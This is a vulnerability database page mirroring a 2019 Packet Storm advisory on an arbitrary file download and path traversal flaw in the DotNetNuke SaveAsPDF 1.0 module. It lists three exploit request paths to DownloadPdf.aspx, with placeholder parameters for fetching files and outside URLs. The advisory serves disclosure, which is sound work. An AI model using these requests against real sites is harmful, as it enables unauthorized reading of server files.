Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKingSkrupellosPACKETSTORM:152052
HistoryMar 11, 2019 - 12:00 a.m.

DotNetNuke SaveAsPDF 1.0 Arbitrary File Download

2019-03-1100:00:00
KingSkrupellos
packetstormsecurity.com
30
JSON
`####################################################################  
  
# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 12/03/2019  
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com  
# Software Information Links :  
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx  
bizmodules.net/portals/0/downloads/sap.pdf  
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :  
CWE-200 [ Information Exposure ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke   
  
websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including   
  
texts, pictures and even flash contents.   
  
####################################################################  
  
# Impact :  
***********  
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download   
  
arbitrary files because the application fails to sufficiently sanitize user-supplied input.   
  
An attacker can exploit this issue to download arbitrary files within the context of the   
  
web server process and obtain potentially sensitive informations and it works for   
  
open redirection vulnerability.  
  
* An information exposure is the intentional or unintentional disclosure of information to an actor   
  
that is not explicitly authorized to have access to that information.  
  
* The software uses external input to construct a pathname that should be within a   
  
restricted directory, but it does not properly neutralize sequences such as ".." that   
  
can resolve to a location that is outside of that directory.  
  
####################################################################  
  
# Arbitrary File Download Exploit :  
*******************************  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov  
  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]  
  
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]  
  
Note : It can download any random website as pdf file in to your computer and   
  
it downloads a system files from DNNSoftware.  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
JSON